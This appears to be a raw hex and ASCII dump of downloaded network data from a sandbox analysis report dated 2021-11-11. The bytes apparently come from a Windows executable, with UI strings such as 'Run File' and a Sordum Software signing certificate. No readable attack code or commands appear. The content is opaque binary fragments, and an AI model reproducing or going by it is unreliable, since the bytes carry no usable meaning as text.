                                                                                                                                                                                2021-11-11 11:26:27 UTC7109INData Raw: 68 64 8b 75 61 1b 0c 4e d7 84 04 ff 6c 4f ef e3 be 7e 7c 72 a3 0d 57 6e 58 ac 04 66 fe 9d 2c 94 38 59 5a a7 2d 96 10 71 d3 9f bd 3c fb 4b a5 ca 01 6c aa f6 e0 0b d7 ac 85 d5 64 c8 a9 ad 14 7d 56 40 e3 82 08 99 d8 93 71 f7 d3 7e bc d4 15 cf 78 f1 9a a3 bb f0 63 df d3 68 5e de c6 98 c0 36 fa 3c b3 4e 37 ba cf f9 9f 65 ff cc fe bd df 8f a7 f6 78 f1 ad e5 37 15 3d cf 89 90 07 f5 52 df 3b 0f 7e f9 a2 55 9a 5c 48 98 1e dc fe 83 a7 7e fd c8 b6 83 ca 95 b3 31 12 70 ae 3e 79 f4 42 8f 23 f8 e7 8a a7 0f 0f 76 e0 f2 45 12 6e dd b2 e1 b8 ce bb c9 a8 53 c8 83 ef ff 81 a1 38 3e ff 58 40 0d 94 a0 1b 35 e1 4e fc e4 9f ce 87 51 af 3f e6 f5 73 42 b0 98 74 4a 80 25 92 32 3e f1 d7 11 0c 85 24 25 73 09 f7 ec c1 1f bd 4f 60 29 a2 25 d3 fb 82 cf d4 f4 32 95 3e 30 d2 38 e3 0c c0
                                                                                                                                                                                Data Ascii: hduaNlO~|rWnXf,8YZ-q<Kld}V@q~xch^6<N7ex7=R;~U\H~1p>yB#vEnS8>X@5NQ?sBtJ%2>$%sO`)%2>08
                                                                                                                                                                                2021-11-11 11:26:27 UTC7125INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                2021-11-11 11:26:27 UTC7126INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                2021-11-11 11:26:27 UTC7142INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                2021-11-11 11:26:27 UTC7143INData Raw: f0 f3 f4 ff f0 f2 f4 ff ef f1 f2 ff ed f0 f1 ff ed ef f0 ff ec ee ef ff eb ed ee ff ea ec ed ff e9 eb ec ff e7 ea eb ff e6 e9 e9 ff e6 e8 e9 ff e4 e6 e7 ff da dc dc ff bc ab 9e ff e1 78 3b ff e3 74 31 f1 bb 78 5d 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b5 76 3c b1 e9 96 4e ff dc 7b 32 ff ba a6 97 ff ef f2 f4 ff fa fa fb ff f8 f8 f8 ff f6 f6 f7 ff f5 f6 f6 ff f4 f5 f5 ff f3 f3 f4 ff f2 f3 f3 ff f1 f1 f2 ff f0 f0 f1 ff ef ef f0 ff ee ee ee ff ed ed ee ff ec ec ed ff eb eb ec ff ea ea ea ff e9 e9 e9 ff e8 e8 e8 ff e7 e8 e8 ff e7 e8 e8 ff e8 e8 e9 ff ea ea ea ff d8 db db ff c4 92 72
                                                                                                                                                                                Data Ascii: x;t1x]v<N{2r
                                                                                                                                                                                2021-11-11 11:26:27 UTC7159INData Raw: e0 dd d3 ff 84 81 7b ff b5 ae a2 ff bf bb b5 ff f2 f2 f2 ff fa fa fa ff fa fa fa ff 8c 89 85 ff 8c 89 85 ff fa fa fa ff fa fa fa ff cc cc cc ff dc da d7 ff fa fa f9 ff a6 a6 a6 ff fa f9 f8 ff db d7 cd ff cc cc cc ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff 8c 89 85 ff 8c 89 85 ff fa fa fa ff fa fa fa ff fa fa fa ff 9d 9d 9c ff dc da d7 ff e5 e3 dd ff db d9 d2 ff 94 93 91 ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff 8c 89 85 ff 8c 89 85 ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff c3 c3 c3 ff 8b 8b 8b ff c3 c3 c3 ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff 8c 89 85 ff 8c 89 85 ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa ff fa fa fa
                                                                                                                                                                                Data Ascii: {
                                                                                                                                                                                2021-11-11 11:26:27 UTC7160INData Raw: 74 00 69 00 6f 00 6e 00 73 00 5c 00 6e 00 20 00 26 00 48 00 65 00 6c 00 70 00 3a 00 46 00 69 00 6c 00 65 00 20 00 4c 00 6f 00 63 00 61 00 74 00 69 00 6f 00 6e 00 5c 00 6e 00 20 00 50 00 61 00 72 00 61 00 6d 00 65 00 74 00 65 00 72 00 5c 00 6e 00 20 00 53 00 74 00 61 00 72 00 74 00 20 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 5c 00 6e 00 20 00 57 00 69 00 6e 00 64 00 6f 00 77 00 20 00 53 00 74 00 61 00 74 00 65 00 27 00 48 00 69 00 64 00 64 00 65 00 6e 00 5c 00 6e 00 20 00 4e 00 6f 00 72 00 6d 00 61 00 6c 00 5c 00 6e 00 20 00 4d 00 69 00 6e 00 69 00 6d 00 69 00 7a 00 65 00 64 00 5c 00 6e 00 20 00 4d 00 61 00 78 00 69 00 6d 00 69 00 7a 00 65 00 64 00 08 00 52 00 75 00 6e 00 20 00 46 00 69 00 6c 00 65 00 08 00 41 00 64 00 64 00 20 00 46 00 69
                                                                                                                                                                                Data Ascii: tions\n &Help:File Location\n Parameter\n Start Directory\n Window State'Hidden\n Normal\n Minimized\n MaximizedRun FileAdd Fi
                                                                                                                                                                                2021-11-11 11:26:27 UTC7176INData Raw: e1 74 80 e7 bc 51 52 2f 31 c3 d2 3e 60 7d b3 3a d7 bd 96 84 43 76 e3 e5 e9 00 9a e0 9d ba c9 9d 3f 6a 1c 52 75 0c 92 37 4e c0 62 e2 a1 fa d2 fb af 1c 7f 15 d8 19 9f 43 99 02 ba 94 bc 3b 05 4b fc 4c 8d 6e 48 c5 24 1b c0 5f 1a ac 29 a7 26 07 7e 11 9e 30 51 6b 66 45 e0 fe a6 0a 68 57 de 7c 37 91 22 ef 80 ac 24 47 39 92 45 ad a0 4a b8 35 d5 ef 1f 63 f0 23 e5 45 b9 57 12 57 38 00 5d d0 e5 45 7b 6e 5a 3a 58 13 2b 0b 4d 0f 01 61 04 c3 30 07 a4 e8 ae f7 41 d6 f3 9e 43 f0 37 3b 92 40 a7 56 c5 d8 51 95 d7 d1 39 1c ef 26 e7 17 0a 19 3e 1e da 25 06 88 e1 be 4e 97 1d bb 79 7b a6 1b 7d a4 80 6d 11 fb 63 1b 76 f3 f3 64 6d 30 54 52 7f e9 ab ed 88 15 65 a3 93 3d ad a3 84 21 36 9e 4f 0a d1 e6 cc 81 2e 54 fb 9a 43 56 cb b8 bd 29 5f 20 55 57 29 9f 18 56 6d 0d 3c b8 b5 83 2b
                                                                                                                                                                                Data Ascii: tQR/1>`}:Cv?jRu7NbC;KLnH$_)&~0QkfEhW|7"$G9EJ5c#EWW8]E{nZ:X+Ma0AC7;@VQ9&>%Ny{}mcvdm0TRe=!6O.TCV)_ UW)Vm<+
                                                                                                                                                                                2021-11-11 11:26:27 UTC7177INData Raw: e1 75 cf b9 31 46 14 a8 9b 1f 67 13 41 50 6e 46 de a4 0b bd e9 59 76 d5 f9 cc fb 05 90 65 50 bf 19 59 2b 9d 74 44 a8 4a 58 3c 2f 18 bb c1 84 e9 ae 7f 97 bb 6f 34 16 0e 3c 06 f2 69 23 2e 0f 25 51 18 04 3e b8 2e df 1d be f8 56 dc bd 29 00 22 0a fe a4 5f 8b 19 52 57 d1 8b e3 55 b2 5e 0d 31 40 29 39 c9 75 84 4f 7a 92 6e 8b 2f 18 85 b3 69 5f 4b 2e 81 b7 d9 48 81 73 83 56 e7 94 03 cc 49 cc 62 cd 2f 29 f0 9e c3 e2 af 44 4f a2 93 19 c7 86 d6 a0 21 94 69 0f b7 c6 e4 d0 28 a8 45 f6 a5 d5 44 e5 45 8a 00 30 d9 bb 70 fc 2d 8c fc 0f fe 24 4e a3 45 b0 a8 f2 f8 1f 59 ac 95 b2 8f 42 ad c7 05 29 00 af 49 38 5c fd 05 22 a3 8e 99 d6 ea b3 22 8e 49 09 7f 82 36 32 1d ee 9d 46 d1 dc 21 a7 06 7f 95 a0 34 b3 82 7c 9c 67 2d 28 be 14 b8 14 59 61 c8 a5 44 06 ab 27 56 0e 88 ec 04 eb
                                                                                                                                                                                Data Ascii: u1FgAPnFYvePY+tDJX</o4<i#.%Q>.V)"_RWU^1@)9uOzn/i_K.HsVIb/)DO!i(EDE0p-$NEYB)I8\""I62F!4|g-(YaD'V
                                                                                                                                                                                2021-11-11 11:26:27 UTC7193INData Raw: 8a e7 34 69 b6 69 b0 5b 76 b2 72 b8 dc 14 82 23 e5 7f d2 af 96 86 a4 cf 0a 7a 08 72 0f ff 6c d3 b6 b9 da a3 79 29 e2 78 bd 48 b4 67 63 53 45 af e2 d9 b9 0b cb 65 7d d1 ff c7 3a 0d 9c 8d 98 1e 98 12 29 13 7e ef 77 83 29 c2 46 eb 7f 12 14 80 86 60 c3 64 8a 2c d2 ab 39 50 0b ae 63 5c 27 2e f8 e5 2d a7 42 de 8b b5 f8 a5 db 32 68 e1 69 17 b1 82 1f 1b e4 c4 d8 af 67 bd 94 79 c8 a1 21 f1 30 1e 81 f7 fa 11 38 f6 5a f5 ef e2 17 b5 b4 d8 d9 f7 57 fc 95 dc 06 54 57 ea 07 25 d8 57 1f ee 66 87 05 c5 57 c9 44 e7 07 9d 71 69 08 bc 5e 12 00 cb 6e f6 d5 fa 56 cc cc 2c cb 62 a4 88 8b 2b f3 60 f7 ec bc 0a 47 8f 23 b4 a7 d3 6d b5 7c 5f 14 b8 59 a0 1f d6 14 68 44 b9 30 9f 03 43 53 ee 15 a5 8b ea c1 15 67 3c 50 64 ce ac 6e bd 1c 40 a5 cc ac 64 c3 4b 3c 8a 8a d2 f6 98 e6 5e 62
                                                                                                                                                                                Data Ascii: 4ii[vr#zrly)xHgcSEe}:)~w)F`d,9Pc\'.-B2higy!08ZWTW%WfWDqi^nV,b+`G#m|_YhD0CSg<Pdn@dK<^b
                                                                                                                                                                                2021-11-11 11:26:27 UTC7194INData Raw: 0e 40 a1 eb 84 e5 03 a6 82 5b 2a 5e 8d bc 1a ff b5 5a ca 46 52 61 5c a6 b3 72 49 17 2e 6c 0e ee 01 fb 54 34 6d 84 87 2f 9d 3f 85 ca 2a 1f 35 39 4e 69 b8 bb e1 06 b1 f9 c8 7c 23 17 57 48 ba 98 ab f8 02 ed cb ec c3 ee ae c4 c3 5f 01 a1 f9 9d e3 19 26 6d 1d 80 2d 68 cd 7e 4d 84 4f e3 74 3c 87 58 d9 6f e2 89 a8 c3 90 ef 8f a1 e7 de 5f ba a2 3d 38 4e a7 3a 03 c5 5f a1 ef 0d 25 72 c7 34 26 b8 f2 f9 20 0b c4 07 6e 13 ff 65 47 5f fb ae 12 3b 02 f9 14 2f d3 12 20 16 42 20 e4 c5 ab df 48 8a 8b 2e 7e 9a 5a ec 2d f6 8d 23 65 48 17 dd 29 f3 3b 4e b8 a3 9e 17 be be 47 72 5b 26 ee cb 8f a1 68 47 e6 83 a0 fc d5 1b 20 03 79 cd 5c bb 3f c2 5d 4b 93 35 a5 a2 a4 cf 8d 41 ee aa 01 54 a0 22 09 af 6d 02 e9 c5 60 c8 72 47 33 bf 7d ef 91 7d 61 8e 04 95 84 7c fc 0f 35 0e 21 4a 37
                                                                                                                                                                                Data Ascii: @[*^ZFRa\rI.lT4m/?*59Ni|#WH_&m-h~MOt<Xo_=8N:_%r4& neG_;/ B H.~Z-#eH);NGr[&hG y\?]K5AT"m`rG3}}a|5!J7
                                                                                                                                                                                2021-11-11 11:26:27 UTC7210INData Raw: 34 de df f3 d2 2f 49 e7 e0 cf f4 7f 41 54 41 9a c3 51 d4 01 04 f0 87 97 c1 24 c4 f0 f3 fb a2 dd ca 07 54 93 6b 1f 6f f3 51 3a 8a 9b 21 1a 3e 91 6b a6 d0 45 ba 01 9e 98 9f 42 a2 11 c2 88 e3 c2 a1 c3 62 4f ba cd 49 7e 58 a0 6d 5b 0e 81 56 b8 9e 77 52 8e 14 bd 31 19 67 00 4e cf bb ee 12 26 e0 b7 42 51 60 69 5b ae 0a f5 dc a7 ce 28 eb 0d 21 d9 d0 72 82 10 33 3b 27 39 1b b8 95 cd 78 88 64 3e 54 ef b7 dd 53 b9 1e 18 5e bd a4 c6 b8 41 af 2c b4 e8 76 77 3e 24 ab 86 62 be c5 b0 02 6c de af 75 fe 61 69 ec f2 ae 6d 13 00 5f 48 18 be 81 81 b4 00 6e 03 53 aa 29 fb e2 80 4f 61 89 d0 ba 7c 3c d1 a0 73 38 d0 cb 58 c8 f6 e6 f6 a6 dc f1 75 74 c9 15 e4 af 43 3b 0f bb 54 ec 8b 28 d5 f8 6a ea 90 b0 4a f9 1b 8b c5 d9 8e 6b ca 84 89 51 b4 8b d2 35 27 d2 48 a3 a4 ad b9 1a 0b 39
                                                                                                                                                                                Data Ascii: 4/IATAQ$TkoQ:!>kEBbOI~Xm[VwR1gN&BQ`i[(!r3;'9xd>TS^A,vw>$bluaim_HnS)Oa|<s8XutC;T(jJkQ5'H9
                                                                                                                                                                                2021-11-11 11:26:27 UTC7211INData Raw: f3 61 4c dd 05 95 bd 85 73 6a c2 04 af 5f 19 3b 0d f2 1e 27 c6 9f c7 99 d9 f0 b6 28 01 4e 78 de b8 6c 7f b2 9b 43 97 92 20 53 68 19 5f 68 8f 8c fd a7 05 92 ff c5 19 54 f2 3a 05 15 36 f3 7f d7 2d a4 5c 44 79 f5 25 4f 80 e0 dc 93 93 eb 94 5b a2 ee e3 44 68 b7 e0 8d 3d 4b 1c 06 f0 77 b8 74 ef 96 6e f0 74 46 1e 2a 48 43 46 60 bf 80 e7 fe a3 1c 42 91 63 2c 90 47 9e 92 6b 71 97 7c 23 f2 67 51 66 df 10 4b 09 c5 30 60 01 39 02 75 44 2f 4c 80 fa 61 b8 7c d5 2e 2b 3c 55 79 70 19 7e 97 97 36 d6 97 b4 1b b3 e9 22 70 be a6 36 02 bb 53 28 56 27 52 bc 63 97 5d 7a 75 6e d3 bc 03 70 a6 8a d4 4a 9c 62 c8 32 7b 8e c1 18 cb 06 09 0e be 87 2e 0b 55 bd 4f 35 7e b0 e6 1c bf 00 e6 0f 96 1b 32 b5 79 f1 57 62 ff af eb 4a b1 03 be 59 6e 83 ed e5 95 75 6c 62 59 ed e5 8b e6 13 d1 0f
                                                                                                                                                                                Data Ascii: aLsj_;'(NxlC Sh_hT:6-\Dy%O[Dh=KwtntF*HCF`Bc,Gkq|#gQfK0`9uD/La|.+<Uyp~6"p6S(V'Rc]zunpJb2{.UO5~2yWbJYnulbY
                                                                                                                                                                                2021-11-11 11:26:27 UTC7227INData Raw: 33 d0 7b 8c b3 97 04 40 2a 05 23 69 c6 2e a0 f0 90 5c d1 b5 e9 43 0d 36 dc 53 a6 f2 85 4b e9 07 d4 44 de d5 b4 13 25 88 d7 e0 8f b5 70 1a d0 58 81 30 69 b4 48 79 ec 8c 7e 80 91 c8 2a f9 d1 d5 d3 ca d7 63 8d 56 e3 66 62 7b 70 a0 0f ac aa 95 9e ec 81 ed 53 0e fb 5a 1b e8 1d ba b3 b7 f2 6a 02 2a 81 fb 3e 17 26 d3 9f 27 e0 c0 ba 77 53 9d bf 3d 7f 81 cb 69 1a 68 ae de 10 76 97 69 67 13 df 95 cc 6e 64 1d e0 5f a4 fa db 7b bf 3b f3 cf cd 4f 1f 83 d1 ee a4 e6 c1 27 f2 c4 b5 67 82 d5 03 08 e3 90 46 c6 67 2c 24 f8 de 2e d5 2b f6 0b 94 d6 a9 3c c0 fd ee fc 07 ae df 4e 2f 08 51 39 8d 5b 3e df 8b e4 5b 1a 86 af e8 aa a5 47 12 fb af 60 02 c5 61 be 7c 94 90 de c5 94 19 f1 07 fe 0b 35 c9 fa 1d 49 67 33 de a9 08 a9 af 1f ae fe e3 23 49 9e cf 24 f4 54 6f 89 0f dd 74 7e 5a
                                                                                                                                                                                Data Ascii: 3{@*#i.\C6SKD%pX0iHy~*cVfb{pSZj*>&'wS=ihvignd_{;O'gFg,$.+<N/Q9[>[G`a|5Ig3#I$Tot~Z
                                                                                                                                                                                2021-11-11 11:26:27 UTC7228INData Raw: 2b 53 de 66 07 6c da e4 6a 77 c9 56 3d a2 e0 5e 97 6b 04 15 66 48 74 a9 0c 56 f4 eb 64 38 22 f4 d9 e4 91 f7 46 28 c8 2f 12 f8 ed 79 f2 62 08 20 6d dc 9c 50 75 f8 8d 91 0e e4 a7 57 90 f7 77 aa 97 1f 96 a7 e4 c1 13 81 1b 8d 56 05 cd 98 d8 9a 66 e1 0c 67 a8 83 b6 6a 44 88 ff e0 dd 58 d2 6d a1 52 c1 80 7f a7 4a c4 18 29 ab 04 70 2b a4 c2 49 46 64 5d 3e 72 b7 93 7c a2 4c c2 ed 4b 8c d8 c8 77 75 6c 43 c4 f4 0c 65 ab b9 a9 ec 2b 4e 1e 08 66 dc 37 5d 84 05 69 57 0d 5e b1 62 30 84 7a 4f 08 0e 6f 0a 0f 7d 95 ec 1b b9 2c 48 fd 9d 69 0a e1 90 bc 4e 9d 46 ba 5d 40 e2 10 a9 9b 57 24 8a 80 26 7a a4 b9 3f d3 75 b0 c4 1d 9b dc d1 81 c4 bc 27 1d 69 79 4c 03 7e 70 14 78 67 db 9f 64 31 80 3c c1 3f e3 b7 4e 47 37 ce dc 5b a6 54 ca f1 ef 37 ba ba d7 59 70 d6 36 b3 f6 69 b6 86
                                                                                                                                                                                Data Ascii: +SfljwV=^kfHtVd8"F(/yb mPuWwVfgjDXmRJ)p+IFd]>r|LKwulCe+Nf7]iW^b0zOo},HiNF]@W$&z?u'iyL~pxgd1<?NG7[T7Yp6i
                                                                                                                                                                                2021-11-11 11:26:27 UTC7244INData Raw: 84 2f 0c 36 33 7b 82 c9 92 4f 23 b4 51 0b 45 05 ee 37 99 42 cf 8b 12 e1 fd 3e 24 d8 90 68 7d ba e7 d9 b7 3a 22 bf dd ca fa 89 f3 a7 0d 4b 84 8c d0 bb 12 b7 9e 32 1c 23 a9 0b 9e ac fb 7f 47 b9 cd 4a 4f f9 8e 9b cc ef 8b c2 86 7f f3 e6 b2 65 8b 60 0e 65 aa 70 7a f5 99 ac 26 5a ee 6a 5f ec a9 bb 37 88 c8 7e e8 97 de 81 d2 ce 68 15 1e 71 68 8f 17 5b 4e 47 6a 3a 76 b1 e1 fc ea 5a 23 c8 4f c1 b0 77 8a d9 a7 25 e7 43 c0 89 07 c2 a0 49 11 e0 fc b3 d9 cf 0d bd 8c 4d 2b 48 4c 4a a3 51 94 98 15 c0 04 00 d8 b1 25 3e 8e 68 89 d7 27 a3 a4 5d 5d 0f 82 bc a1 4f 24 14 79 02 f8 a1 8f e6 bf 81 2c 94 a2 4a 98 38 33 78 6a 76 35 f7 82 79 e8 81 33 12 48 d3 a8 e8 42 47 ab 7b 16 73 57 6d ae 8f df 00 58 2a 7e a7 cd 35 ac d8 98 84 a5 f7 a2 1b 57 85 e3 9b b7 dd ff c1 18 a9 b0 b2 76
                                                                                                                                                                                Data Ascii: /63{O#QE7B>$h}:"K2#GJOe`epz&Zj_7~hqh[NGj:vZ#Ow%CIM+HLJQ%>h']]O$y,J83xjv5y3HBG{sWmX*~5Wv
                                                                                                                                                                                2021-11-11 11:26:27 UTC7245INData Raw: 4f fc 1f d1 dc c0 ff f8 a2 74 2c a7 3e b1 0a 79 ae 0f b2 ae d2 59 ef dc 48 55 07 54 16 5d 22 ac ac ac 99 f9 e3 d4 aa fb 59 4b 53 6d 9c 33 51 8e ad 28 be 43 0a b0 87 d1 d3 4f 57 6b ac 87 9d 9d c6 b9 f1 88 c9 c3 24 28 75 8f 6d ce d0 cb e3 0c 99 1b 56 9d d3 09 3e 0e c7 1e 0e fa b8 8e c4 5a 6a 09 9b d8 f5 23 37 f6 cf 2c 05 b6 fc 5d 49 8a 2f 36 bb ec 4a 4e 31 e8 52 5c 04 6b 83 e5 95 c1 14 06 30 63 a3 76 c7 58 24 a2 78 c0 ea 97 5a 04 cd cf bd 24 97 4f eb 55 e9 37 9a 0a f6 e1 ef b7 ae d2 60 bb 39 f1 05 06 b7 e5 0d 9a f5 4f 02 a7 d5 5e c0 06 28 5d c7 8e 1d a5 83 da fa fe e3 a9 b6 4a 50 2f 0d 26 4c 9d 97 5b 1e 25 d5 d1 42 e9 30 4c 84 14 16 6c a0 76 a2 71 71 49 d2 cf cf 14 d7 5d 61 fe 52 68 be ee 89 9e 45 19 a1 06 ae c0 59 d8 bf 7d a7 28 90 cc d1 26 d4 a4 a9 8f 40
                                                                                                                                                                                Data Ascii: Ot,>yYHUT]"YKSm3Q(COWk$(umV>Zj#7,]I/6JN1R\k0cvX$xZ$OU7`9O^(]JP/&L[%B0LlvqqI]aRhEY}(&@
                                                                                                                                                                                2021-11-11 11:26:27 UTC7261INData Raw: 7c f8 61 7d 08 d1 52 db db 7a 4c 44 cb fd 60 3e 99 1f 77 d9 b0 0d 4b 92 6c ba de 45 5e 64 b7 d4 65 f4 4e 89 a1 b1 40 8c ea a6 d6 62 84 18 0f 28 4b 93 39 ff ec 6c 59 41 b9 7b e6 da 0d ff ca 57 25 17 e9 ae c7 e9 02 84 5b 79 60 67 15 7f 1f 1c a3 6d d6 61 18 04 0e 4a f0 6f 0e e2 84 51 b5 92 f0 c2 48 ac d9 7a ad 4c 9d 27 41 7c 13 e4 29 3d 06 be 98 2a 6c b1 51 87 8d 07 73 a3 2b c4 ba 1e d9 11 82 46 ed 78 a6 d3 02 fb 81 98 90 36 ad 61 70 9c ce 42 ad 59 9f 62 f8 f7 1a f5 63 46 bb 1f 38 da 02 d6 7c 5c e7 64 f6 c8 20 fb b2 26 73 4b f3 ef aa ae f5 1d b9 c2 82 75 f2 43 21 a0 6b 1f 15 30 d1 b9 38 70 12 0e ed 8c 34 3e a2 c5 9f b0 63 78 3a aa 6c 31 02 f6 aa 36 de 38 4c a6 e5 c1 e9 32 23 b5 12 d0 bd 9f c8 b4 60 17 c2 b2 5b 6e 69 95 d1 8b f8 d8 09 e2 a2 cb 6b 47 6a 9b b5
                                                                                                                                                                                Data Ascii: |a}RzLD`>wKlE^deN@b(K9lYA{W%[y`gmaJoQHzL'A|)=*lQs+Fx6apBYbcF8|\d &sKuC!k08p4>cx:l168L2#`[nikGj
                                                                                                                                                                                2021-11-11 11:26:27 UTC7262INData Raw: 85 f5 b3 28 37 3f a0 00 8d b0 a4 ef 8e a0 4e c2 48 24 a9 e6 0a d8 5d 05 c8 41 a4 c3 76 84 5b b0 d1 1b 8f 1a 4d 3f 4f 88 6e a7 dc f5 40 da 89 32 ee a0 79 ad c2 20 92 db f3 b5 0f 3d 1e 36 ea 53 1e 85 2b a0 3b a4 de 33 c7 1f 52 76 96 87 4c bb 1e 91 6e f3 9f 0e 8c 12 c0 b4 8c 06 e7 09 11 95 2d ad dd 06 33 0a ad f3 fe 84 87 38 04 28 6e 51 00 c0 9e 0f c6 ad a2 98 28 d3 11 83 0a f3 28 6b 96 e3 44 dc a8 a0 b3 94 09 e4 d2 91 61 32 82 c2 66 0d c4 65 f7 70 72 c0 86 31 c8 04 47 f2 1b 7a e1 ee 22 63 52 66 2a bb 93 76 6c d2 2e 3d e3 71 78 9d 93 35 e4 ce 11 02 fd ad 6e a0 cf e7 c3 62 b2 c6 6b 53 db d0 08 96 ed 54 da b1 d2 1d f9 e3 5d 15 ed d2 c1 b1 a9 e4 30 65 7b f5 8c ec 58 06 97 00 37 4c 92 bc 08 45 0a 09 41 1a f9 e9 f2 f3 86 da 1f 3d f6 41 5c 7d 11 a3 24 fc 87 74 21
                                                                                                                                                                                Data Ascii: (7?NH$]Av[M?On@2y =6S+;3RvLn-38(nQ((kDa2fepr1Gz"cRf*vl.=qx5nbkST]0e{X7LEA=A\}$t!
                                                                                                                                                                                2021-11-11 11:26:27 UTC7278INData Raw: 01 07 02 a0 82 1d 01 30 82 1c fd 02 01 01 31 0b 30 09 06 05 2b 0e 03 02 1a 05 00 30 68 06 0a 2b 06 01 04 01 82 37 02 01 04 a0 5a 30 58 30 33 06 0a 2b 06 01 04 01 82 37 02 01 0f 30 25 03 01 00 a0 20 a2 1e 80 1c 00 3c 00 3c 00 3c 00 4f 00 62 00 73 00 6f 00 6c 00 65 00 74 00 65 00 3e 00 3e 00 3e 30 21 30 09 06 05 2b 0e 03 02 1a 05 00 04 14 33 f8 17 55 9e 33 1b 79 64 02 64 6e d6 11 4a aa fa 2b 3d 73 a0 82 17 c1 30 82 02 49 30 82 01 b6 a0 03 02 01 02 02 10 c2 cb bd 94 6b c3 fd b9 44 d5 22 93 1d 61 d5 1a 30 09 06 05 2b 0e 03 02 1d 05 00 30 1a 31 18 30 16 06 03 55 04 03 13 0f 53 6f 72 64 75 6d 20 53 6f 66 74 77 61 72 65 30 1e 17 0d 30 35 31 32 33 31 32 31 30 30 30 30 5a 17 0d 32 35 31 32 33 31 32 31 30 30 30 30 5a 30 1a 31 18 30 16 06 03 55 04 03 13 0f 53 6f 72
                                                                                                                                                                                Data Ascii: 010+0h+7Z0X03+70% <<<Obsolete>>>0!0+3U3yddnJ+=s0I0kD"a0+010USordum Software0051231210000Z251231210000Z010USor
                                                                                                                                                                                2021-11-11 11:26:27 UTC7279INData Raw: cb 2e 4b e1 60 82 46 e1 52 ab 0c 81 47 70 6c dd 64 d1 eb f5 2c a3 0f 82 3d 0c 2b ae 97 d7 b6 14 86 10 79 bb 3b 13 80 77 8c 08 e1 49 d2 6a 62 2f 1f 5e fa 96 68 df 89 27 95 38 9f 06 d7 3e c9 cb 26 59 0d 73 de b0 c8 e9 26 0e 83 15 c6 ef 5b 8b d2 04 60 ca 49 a6 28 f6 69 3b f6 cb c8 28 91 e5 9d 8a 61 57 37 ac 74 14 dc 74 e0 3a ee 72 2f 2e 9c fb d0 bb bf f5 3d 00 e1 06 33 e8 82 2b ae 53 a6 3a 16 73 8c dd 41 0e 20 3a c0 b4 a7 a1 e9 b2 4f 90 2e 32 60 e9 57 cb b9 04 92 68 68 e5 38 26 60 75 b2 9f 77 ff 91 14 ef ae 20 49 fc ad 40 15 48 d1 02 31 61 19 5e b8 97 ef ad 77 b7 64 9a 7a bf 5f c1 13 ef 9b 62 fb 0d 6c e0 54 69 16 a9 03 da 6e e9 83 93 71 76 c6 69 85 82 17 02 03 01 00 01 a3 42 30 40 30 0e 06 03 55 1d 0f 01 01 ff 04 04 03 02 01 06 30 0f 